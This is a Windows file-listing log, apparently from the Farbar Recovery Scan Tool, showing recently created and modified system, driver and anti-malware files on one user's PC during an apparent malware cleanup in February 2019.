2019-02-11 22:22 - 2019-02-11 22:22 - 000000000 ____D C:\Users\Fantacola\Downloads\mb_driver_audio_realtek_100series
2019-02-11 22:17 - 2019-02-11 22:36 - 000003120 _____ C:\WINDOWS\System32\Tasks\AMDLinkUpdate
2019-02-11 22:17 - 2019-02-11 22:17 - 000003198 _____ C:\WINDOWS\System32\Tasks\ModifyLinkUpdate
2019-02-11 22:16 - 2019-02-11 22:16 - 000003160 _____ C:\WINDOWS\System32\Tasks\StartCN
2019-02-11 22:16 - 2019-02-11 22:16 - 000003074 _____ C:\WINDOWS\System32\Tasks\StartDVR
2019-02-11 22:16 - 2019-02-11 22:16 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Settings
2019-02-11 22:16 - 2019-02-11 22:16 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\##ID_STRING16##
2019-02-11 22:15 - 2019-02-11 22:29 - 000000000 ____D C:\WINDOWS\LastGood.Tmp
2019-02-11 22:15 - 2019-02-11 22:15 - 000000000 ____D C:\Program Files (x86)\AMD
2019-02-11 22:04 - 2019-02-11 22:04 - 000247919 _____ C:\Users\Fantacola\Desktop\mbst-clean-results.txt
2019-02-11 22:03 - 2019-02-11 22:04 - 064531912 _____ (Malwarebytes ) C:\WINDOWS\SysWOW64\mb-setup.exe
2019-02-11 22:00 - 2019-02-11 22:00 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190211_220032.txt
2019-02-11 21:37 - 2019-02-11 21:37 - 342490944 _____ (AMD Inc.) C:\Users\Fantacola\Downloads\win10-64bit-radeon-software-adrenalin-2019-edition-19.2.1-feb4.exe
2019-02-11 21:22 - 2017-07-17 05:29 - 002601712 _____ (ELAN Microelectronics Corp.) C:\WINDOWS\EFDUninst.dll
2019-02-11 21:19 - 2019-02-11 22:34 - 000000000 ____D C:\ProgramData\Malwarebytes
2019-02-11 21:17 - 2019-02-11 21:18 - 000000000 ____D C:\Users\Fantacola\Desktop\Old Firefox Data
2019-02-11 21:17 - 2019-02-11 21:17 - 000001005 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk
2019-02-11 21:17 - 2019-02-11 21:17 - 000000993 _____ C:\Users\Public\Desktop\Firefox.lnk
2019-02-11 21:17 - 2019-02-11 21:17 - 000000000 ____D C:\Program Files\Mozilla Firefox
2019-02-11 21:17 - 2019-02-11 21:17 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2019-02-11 21:16 - 2019-02-11 21:18 - 064513784 _____ (Malwarebytes ) C:\Users\Fantacola\Downloads\mb3-setup-consumer-3.7.1.2839-1.0.538-1.0.9186.exe
2019-02-11 21:16 - 2019-02-11 21:16 - 000321936 _____ (Mozilla) C:\Users\Fantacola\Downloads\Firefox Installer.exe
2019-02-11 21:05 - 2019-02-11 21:07 - 000529388 _____ C:\WINDOWS\Minidump\021119-23609-01.dmp
2019-02-11 21:04 - 2019-02-11 21:05 - 000000000 _____ C:\Recovery.txt
2019-02-11 21:00 - 2019-02-11 21:00 - 002434048 _____ (Farbar) C:\Users\Fantacola\Downloads\FRSTEnglish.exe
2019-02-11 20:58 - 2019-02-12 07:53 - 000000214 _____ C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job
2019-02-11 20:57 - 2019-02-12 07:59 - 000657290 _____ C:\WINDOWS\ntbtlog.txt
2019-02-11 20:45 - 2019-02-11 20:45 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190211_204556.txt
2019-02-11 20:15 - 2019-02-11 20:15 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190211_201534.txt
2019-02-11 19:59 - 2019-02-11 19:59 - 003571440 _____ C:\Users\Fantacola\Downloads\mb-support-1.3.1.553.exe
2019-02-11 19:55 - 2019-02-11 19:55 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190211_195513.txt
2019-02-11 19:49 - 2019-02-11 19:51 - 000506692 _____ C:\WINDOWS\Minidump\021119-33515-01.dmp
2019-02-11 19:23 - 2019-02-11 19:24 - 000497636 _____ C:\WINDOWS\Minidump\021119-33140-01.dmp
2019-02-11 19:22 - 2019-02-11 21:32 - 265865463 _____ C:\WINDOWS\MEMORY.DMP
2019-02-11 19:13 - 2019-02-11 19:13 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190211_191309.txt
2019-02-11 19:09 - 2019-02-11 19:09 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190211_190928.txt
2019-02-11 17:04 - 2019-02-11 17:04 - 000000011 _____ C:\Users\Fantacola\setup24.ini
2019-02-11 17:03 - 2019-02-11 17:03 - 000000009 _____ C:\Users\Fantacola\rstr4.ini
2019-02-11 17:00 - 2019-02-11 17:00 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190211_170022.txt
2019-02-10 23:18 - 2019-02-11 20:42 - 000012872 _____ (SurfRight B.V.) C:\WINDOWS\system32\bootdelete.exe
2019-02-10 22:56 - 2019-02-10 22:56 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190210_225609.txt
2019-02-10 22:06 - 2019-02-10 22:06 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190210_220635.txt
2019-02-10 22:04 - 2019-02-10 22:04 - 000002648 _____ C:\WINDOWS\system32\.crusader
2019-02-10 21:57 - 2019-02-10 21:57 - 006161408 _____ C:\Users\Fantacola\AppData\Local\dump007.dat
2019-02-10 21:57 - 2019-02-10 21:57 - 000000011 _____ C:\Users\Fantacola\setup22.ini
2019-02-10 21:57 - 2019-02-10 21:57 - 000000009 _____ C:\Users\Fantacola\rstr3.ini
2019-02-10 21:31 - 2019-02-10 21:31 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190210_213108.txt
2019-02-10 21:12 - 2019-02-11 21:35 - 000055232 _____ C:\WINDOWS\system32\Drivers\hitmanpro37.sys
2019-02-10 21:11 - 2019-02-10 21:11 - 000000000 ____D C:\Program Files\HitmanPro
2019-02-10 21:07 - 2019-02-10 21:07 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190210_210709.txt
2019-02-10 21:07 - 2019-02-10 21:07 - 000000000 _____ C:\WINDOWS\Minidump\021019-46671-01.dmp
2019-02-10 20:32 - 2019-02-10 22:04 - 000000000 ____D C:\ProgramData\HitmanPro
2019-02-10 20:30 - 2019-02-10 20:30 - 011576808 _____ (SurfRight B.V.) C:\Users\Fantacola\Downloads\hitmanpro_x64.exe
2019-02-10 20:15 - 2019-02-10 20:15 - 000000000 ____D C:\ProgramData\Mozilla
2019-02-10 20:07 - 2019-02-10 20:07 - 000003738 _____ C:\WINDOWS\System32\Tasks\{A739AAE7-28A5-047F-E408-A851D87C034F}
2019-02-10 20:07 - 2019-02-10 20:07 - 000003558 _____ C:\WINDOWS\System32\Tasks\{E9BE5C8D-F278-A25C-CD0E-330EBB7D274B}
2019-02-10 20:07 - 2019-02-10 20:07 - 000000003 _____ C:\Users\Fantacola\AppData\Local\wbem.ini
2019-02-10 20:07 - 2019-02-10 20:07 - 000000000 ____D C:\ProgramData\localNETService
2019-02-10 14:49 - 2019-02-10 14:49 - 000097087 _____ C:\WINDOWS\uninstaller.dat
2019-02-04 13:53 - 2019-02-04 13:53 - 001587616 _____ (AMD) C:\WINDOWS\system32\coinst_18.50.dll
2019-02-04 13:53 - 2019-02-04 13:53 - 001210784 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\atiadlxx.dll
2019-02-04 13:53 - 2019-02-04 13:53 - 000177568 _____ (Khronos Group) C:\WINDOWS\system32\OpenCL.dll
2019-02-04 13:53 - 2019-02-04 13:53 - 000154016 _____ (Khronos Group) C:\WINDOWS\SysWOW64\OpenCL.dll
2019-02-04 13:53 - 2019-02-04 13:53 - 000019200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\detoured.dll
2019-02-04 13:53 - 2019-02-04 13:53 - 000019200 _____ (Microsoft Corporation) C:\WINDOWS\system32\detoured.dll
2019-02-01 17:16 - 2019-02-01 17:16 - 000173432 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\amdihk64.dll
2019-02-01 17:16 - 2019-02-01 17:16 - 000145104 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\amdihk32.dll
2019-02-01 14:11 - 2019-02-01 14:11 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190201_141129.txt
2019-02-01 07:42 - 2019-02-01 07:42 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190201_074239.txt
2019-02-01 07:33 - 2019-02-01 07:33 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190201_073320.txt
2019-01-31 16:47 - 2019-01-31 16:47 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190131_164726.txt
2019-01-31 07:35 - 2019-01-31 07:35 - 002144854 _____ C:\Users\Fantacola\Downloads\KB0016289_a59f68320fce6ac018fc52b072050e96-1504775265445_af1a6a9adbeffa803468d921ce9619e2_DoD- How To.pdf
2019-01-31 06:11 - 2019-01-31 06:11 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190131_061146.txt
2019-01-30 23:13 - 2019-01-30 23:13 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190130_231353.txt
2019-01-30 17:44 - 2019-01-30 17:44 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190130_174435.txt
2019-01-30 17:40 - 2019-01-30 17:40 - 000002555 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Citrix Workspace.lnk
2019-01-30 17:38 - 2019-01-30 17:38 - 005112792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.dll
2019-01-30 17:38 - 2019-01-30 17:38 - 003550384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfcore.dll
2019-01-30 17:38 - 2019-01-30 17:38 - 002469648 _____ (Microsoft Corporation) C:\WINDOWS\system32\msmpeg2vdec.dll
2019-01-30 17:38 - 2019-01-30 17:38 - 002323904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msmpeg2vdec.dll
2019-01-30 17:38 - 2019-01-30 17:38 - 001289192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfasfsrcsnk.dll
2019-01-30 17:38 - 2019-01-30 17:38 - 000427520 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSFlacDecoder.dll
2019-01-30 17:38 - 2019-01-30 17:38 - 000371712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSFlacDecoder.dll
2019-01-30 17:38 - 2019-01-30 17:38 - 000000000 ____D C:\Program Files (x86)\Citrix
2019-01-30 17:37 - 2019-01-30 17:37 - 026806784 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2019-01-30 17:37 - 2019-01-30 17:37 - 023439360 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2019-01-30 17:37 - 2019-01-30 17:37 - 020811776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2019-01-30 17:37 - 2019-01-30 17:37 - 019284480 _____ (Microsoft Corporation) C:\WINDOWS\system32\HologramWorld.dll
2019-01-30 17:37 - 2019-01-30 17:37 - 019024384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2019-01-30 17:37 - 2019-01-30 17:37 - 015224832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.dll
2019-01-30 17:37 - 2019-01-30 17:37 - 008875520 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstscax.dll
2019-01-30 17:37 - 2019-01-30 17:37 - 007897088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstscax.dll
2019-01-30 17:37 - 2019-01-30 17:37 - 007857152 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2019-01-30 17:37 - 2019-01-30 17:37 - 007724992 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.dll
2019-01-30 17:37 - 2019-01-30 17:37 - 006549232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2019-01-30 17:37 - 2019-01-30 17:37 - 006057984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2019-01-30 17:37 - 2019-01-30 17:37 - 005584864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2019-01-30 17:37 - 2019-01-30 17:37 - 005440008 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfcore.dll
2019-01-30 17:37 - 2019-01-30 17:37 - 005205464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.StateRepository.dll
2019-01-30 17:37 - 2019-01-30 17:37 - 005088256 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2019-01-30 17:37 - 2019-01-30 17:37 - 004630016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2019-01-30 17:37 - 2019-01-30 17:37 - 004526080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\setupapi.dll
2019-01-30 17:37 - 2019-01-30 17:37 - 003656192 _____ (Microsoft Corporation) C:\WINDOWS\system32\mispace.dll
2019-01-30 17:37 - 2019-01-30 17:37 - 002942464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mispace.dll
2019-01-30 17:37 - 2019-01-30 17:37 - 002776920 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2019-01-30 17:37 - 2019-01-30 17:37 - 002689024 _____ (Microsoft Corporation) C:\WINDOWS\system32\WebRuntimeManager.dll
2019-01-30 17:37 - 2019-01-30 17:37 - 002392576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AcGenral.dll
2019-01-30 17:37 - 2019-01-30 17:37 - 002298880 _____ (Microsoft Corporation) C:\WINDOWS\system32\ResetEngine.dll
2019-01-30 17:37 - 2019-01-30 17:37 - 002278448 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfasfsrcsnk.dll
2019-01-30 17:37 - 2019-01-30 17:37 - 002275888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2019-01-30 17:37 - 2019-01-30 17:37 - 001899160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AudioEng.dll
2019-01-30 17:37 - 2019-01-30 17:37 - 001783296 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsp_health.dll
2019-01-30 17:37 - 2019-01-30 17:37 - 001720936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinapi.appcore.dll
2019-01-30 17:37 - 2019-01-30 17:37 - 001674480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll
2019-01-30 17:37 - 2019-01-30 17:37 - 001671864 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32full.dll
2019-01-30 17:37 - 2019-01-30 17:37 - 001467552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32full.dll
2019-01-30 17:37 - 2019-01-30 17:37 - 001387520 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcastdvruserservice.dll
2019-01-30 17:37 - 2019-01-30 17:37 - 001309696 _____ (Microsoft Corporation) C:\WINDOWS\system32\webplatstorageserver.dll
2019-01-30 17:37 - 2019-01-30 17:37 - 001309184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsp_health.dll
2019-01-30 17:37 - 2019-01-30 17:37 - 001282640 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfreadwrite.dll
2019-01-30 17:37 - 2019-01-30 17:37 - 001271608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ContentDeliveryManager.Utilities.dll
2019-01-30 17:37 - 2019-01-30 17:37 - 001259024 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecConfig.efi
2019-01-30 17:37 - 2019-01-30 17:37 - 001254912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TokenBroker.dll
2019-01-30 17:37 - 2019-01-30 17:37 - 001224704 _____ (Microsoft Corporation) C:\WINDOWS\system32\reseteng.dll
2019-01-30 17:37 - 2019-01-30 17:37 - 001200920 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmpeg2srcsnk.dll
2019-01-30 17:37 - 2019-01-30 17:37 - 001168384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Globalization.dll
2019-01-30 17:37 - 2019-01-30 17:37 - 001098136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AudioSes.dll
2019-01-30 17:37 - 2019-01-30 17:37 - 001064448 _____ (Microsoft Corporation) C:\WINDOWS\system32\sysmain.dll
2019-01-30 17:37 - 2019-01-30 17:37 - 001047552 _____ (Microsoft Corporation) C:\WINDOWS\system32\clusapi.dll
2019-01-30 17:37 - 2019-01-30 17:37 - 001018880 _____ (Microsoft Corporation) C:\WINDOWS\system32\termsrv.dll
2019-01-30 17:37 - 2019-01-30 17:37 - 000913920 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft.Graphics.Display.DisplayEnhancementService.dll
2019-01-30 17:37 - 2019-01-30 17:37 - 000912384 _____ (Microsoft Corporation) C:\WINDOWS\system32\EdgeManager.dll
2019-01-30 17:37 - 2019-01-30 17:37 - 000875008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rasapi32.dll
2019-01-30 17:37 - 2019-01-30 17:37 - 000833536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webplatstorageserver.dll
2019-01-30 17:37 - 2019-01-30 17:37 - 000829440 _____ (Microsoft Corporation) C:\WINDOWS\system32\HologramCompositor.dll
2019-01-30 17:37 - 2019-01-30 17:37 - 000794112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\clusapi.dll
2019-01-30 17:37 - 2019-01-30 17:37 - 000787456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Security.Authentication.Web.Core.dll
2019-01-30 17:37 - 2019-01-30 17:37 - 000762368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mprddm.dll
2019-01-30 17:37 - 2019-01-30 17:37 - 000762272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfreadwrite.dll
2019-01-30 17:37 - 2019-01-30 17:37 - 000742912 _____ (Microsoft Corporation) C:\WINDOWS\system32\SpaceControl.dll
2019-01-30 17:37 - 2019-01-30 17:37 - 000681984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\uReFS.dll
2019-01-30 17:37 - 2019-01-30 17:37 - 000663040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\EdgeManager.dll
2019-01-30 17:37 - 2019-01-30 17:37 - 000652320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppXDeploymentClient.dll
2019-01-30 17:37 - 2019-01-30 17:37 - 000649272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kernel32.dll
2019-01-30 17:37 - 2019-01-30 17:37 - 000624640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\apphelp.dll
2019-01-30 17:37 - 2019-01-30 17:37 - 000622592 _____ (Microsoft Corporation) C:\WINDOWS\system32\resutils.dll
2019-01-30 17:37 - 2019-01-30 17:37 - 000615936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Core.TextInput.dll
2019-01-30 17:37 - 2019-01-30 17:37 - 000522312 _____ (Microsoft Corporation) C:\WINDOWS\system32\systemreset.exe
2019-01-30 17:37 - 2019-01-30 17:37 - 000481792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\resutils.dll
2019-01-30 17:37 - 2019-01-30 17:37 - 000434176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TileDataRepository.dll
2019-01-30 17:37 - 2019-01-30 17:37 - 000429056 _____ (Microsoft Corporation) C:\WINDOWS\system32\MixedReality.Broker.dll
2019-01-30 17:37 - 2019-01-30 17:37 - 000349184 _____ (Microsoft Corporation) C:\WINDOWS\system32\AcGenral.dll
2019-01-30 17:37 - 2019-01-30 17:37 - 000314368 _____ (Microsoft Corporation) C:\WINDOWS\system32\AcLayers.dll
2019-01-30 17:37 - 2019-01-30 17:37 - 000289792 _____ (Microsoft Corporation) C:\WINDOWS\system32\discan.dll
2019-01-30 17:37 - 2019-01-30 17:37 - 000284160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rasppp.dll
2019-01-30 17:37 - 2019-01-30 17:37 - 000277536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wintrust.dll
2019-01-30 17:37 - 2019-01-30 17:37 - 000263360 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfps.dll
2019-01-30 17:37 - 2019-01-30 17:37 - 000241152 _____ (Microsoft Corporation) C:\WINDOWS\system32\ResetEngOnline.dll
2019-01-30 17:37 - 2019-01-30 17:37 - 000201216 _____ (Microsoft Corporation) C:\WINDOWS\system32\wincredui.dll
2019-01-30 17:37 - 2019-01-30 17:37 - 000176640 _____ (Microsoft Corporation) C:\WINDOWS\system32\spacebridge.dll
2019-01-30 17:37 - 2019-01-30 17:37 - 000162304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.StateRepositoryUpgrade.dll
2019-01-30 17:37 - 2019-01-30 17:37 - 000159744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wincredui.dll
2019-01-30 17:37 - 2019-01-30 17:37 - 000156672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rasman.dll
2019-01-30 17:37 - 2019-01-30 17:37 - 000151040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\container.dll
2019-01-30 17:37 - 2019-01-30 17:37 - 000137216 _____ (Microsoft Corporation) C:\WINDOWS\system32\SpaceAgent.exe
2019-01-30 17:37 - 2019-01-30 17:37 - 000129024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\spopk.dll
2019-01-30 17:37 - 2019-01-30 17:37 - 000122368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DisplayManager.dll
2019-01-30 17:37 - 2019-01-30 17:37 - 000104960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.NetworkOperators.HotspotAuthentication.dll
2019-01-30 17:37 - 2019-01-30 17:37 - 000104960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\setupcln.dll
2019-01-30 17:37 - 2019-01-30 17:37 - 000093696 _____ (Microsoft Corporation) C:\WINDOWS\system32\nlahc.dll
2019-01-30 17:37 - 2019-01-30 17:37 - 000092672 _____ (Microsoft Corporation) C:\WINDOWS\system32\PktMon.exe
2019-01-30 17:37 - 2019-01-30 17:37 - 000091424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CompPkgSup.dll
2019-01-30 17:37 - 2019-01-30 17:37 - 000086528 _____ (Microsoft Corporation) C:\WINDOWS\system32\nslookup.exe
2019-01-30 17:37 - 2019-01-30 17:37 - 000077824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\nslookup.exe
2019-01-30 17:36 - 2019-01-30 17:36 - 022111856 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2019-01-30 17:36 - 2019-01-30 17:36 - 017520640 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.dll
2019-01-30 17:36 - 2019-01-30 17:36 - 009684000 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2019-01-30 17:36 - 2019-01-30 17:36 - 007645600 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2019-01-30 17:36 - 2019-01-30 17:36 - 005565952 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.pcshell.dll
2019-01-30 17:36 - 2019-01-30 17:36 - 005561856 _____ (Microsoft Corporation) C:\WINDOWS\system32\StartTileData.dll
2019-01-30 17:36 - 2019-01-30 17:36 - 005527552 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputService.dll
2019-01-30 17:36 - 2019-01-30 17:36 - 004702704 _____ (Microsoft Corporation) C:\WINDOWS\system32\setupapi.dll
2019-01-30 17:36 - 2019-01-30 17:36 - 004588544 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppsvc.exe
2019-01-30 17:36 - 2019-01-30 17:36 - 004298752 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_nt.dll
2019-01-30 17:36 - 2019-01-30 17:36 - 004019200 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettingsThresholdAdminFlowUI.dll
2019-01-30 17:36 - 2019-01-30 17:36 - 003982848 _____ (Microsoft Corporation) C:\WINDOWS\system32\EdgeContent.dll
2019-01-30 17:36 - 2019-01-30 17:36 - 003662336 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2019-01-30 17:36 - 2019-01-30 17:36 - 003386368 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2019-01-30 17:36 - 2019-01-30 17:36 - 002927112 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpip.sys
2019-01-30 17:36 - 2019-01-30 17:36 - 002702528 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2019-01-30 17:36 - 2019-01-30 17:36 - 002626568 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ntfs.sys
2019-01-30 17:36 - 2019-01-30 17:36 - 002618880 _____ (Microsoft Corporation) C:\WINDOWS\system32\WsmSvc.dll
2019-01-30 17:36 - 2019-01-30 17:36 - 002488320 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2019-01-30 17:36 - 2019-01-30 17:36 - 002187264 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll
2019-01-30 17:36 - 2019-01-30 17:36 - 002085376 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEng.dll
2019-01-30 17:36 - 2019-01-30 17:36 - 002072728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2019-01-30 17:36 - 2019-01-30 17:36 - 001994768 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll
2019-01-30 17:36 - 2019-01-30 17:36 - 001975296 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
2019-01-30 17:36 - 2019-01-30 17:36 - 001969704 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\refs.sys
2019-01-30 17:36 - 2019-01-30 17:36 - 001715712 _____ (Microsoft Corporation) C:\WINDOWS\system32\ISM.dll
2019-01-30 17:36 - 2019-01-30 17:36 - 001700880 _____ (Microsoft Corporation) C:\WINDOWS\system32\ContentDeliveryManager.Utilities.dll
2019-01-30 17:36 - 2019-01-30 17:36 - 001696936 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2019-01-30 17:36 - 2019-01-30 17:36 - 001641400 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppobjs.dll
2019-01-30 17:36 - 2019-01-30 17:36 - 001604096 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll
2019-01-30 17:36 - 2019-01-30 17:36 - 001533440 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Globalization.dll
2019-01-30 17:36 - 2019-01-30 17:36 - 001467384 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe
2019-01-30 17:36 - 2019-01-30 17:36 - 001462272 _____ (Microsoft Corporation) C:\WINDOWS\system32\TokenBroker.dll
2019-01-30 17:36 - 2019-01-30 17:36 - 001446400 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfc42u.dll
2019-01-30 17:36 - 2019-01-30 17:36 - 001415680 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfc42.dll
2019-01-30 17:36 - 2019-01-30 17:36 - 001341584 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi
2019-01-30 17:36 - 2019-01-30 17:36 - 001331744 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioSes.dll
2019-01-30 17:36 - 2019-01-30 17:36 - 001314304 _____ (Microsoft Corporation) C:\WINDOWS\system32\NotificationController.dll
2019-01-30 17:36 - 2019-01-30 17:36 - 001258512 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\http.sys
2019-01-30 17:36 - 2019-01-30 17:36 - 001178344 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe
2019-01-30 17:36 - 2019-01-30 17:36 - 001054200 _____ (Microsoft Corporation) C:\WINDOWS\system32\ApplyTrustOffline.exe
2019-01-30 17:36 - 2019-01-30 17:36 - 001048576 _____ (Microsoft Corporation) C:\WINDOWS\system32\MPSSVC.dll
2019-01-30 17:36 - 2019-01-30 17:36 - 001032704 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Security.Authentication.Web.Core.dll
2019-01-30 17:36 - 2019-01-30 17:36 - 001010176 _____ (Microsoft Corporation) C:\WINDOWS\system32\refsutil.exe
2019-01-30 17:36 - 2019-01-30 17:36 - 000956416 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusUpdateHandlers.dll
2019-01-30 17:36 - 2019-01-30 17:36 - 000954368 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasapi32.dll
2019-01-30 17:36 - 2019-01-30 17:36 - 000925184 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasmans.dll
2019-01-30 17:36 - 2019-01-30 17:36 - 000901632 _____ (Microsoft Corporation) C:\WINDOWS\system32\schedsvc.dll
2019-01-30 17:36 - 2019-01-30 17:36 - 000887808 _____ (Microsoft Corporation) C:\WINDOWS\system32\mprddm.dll
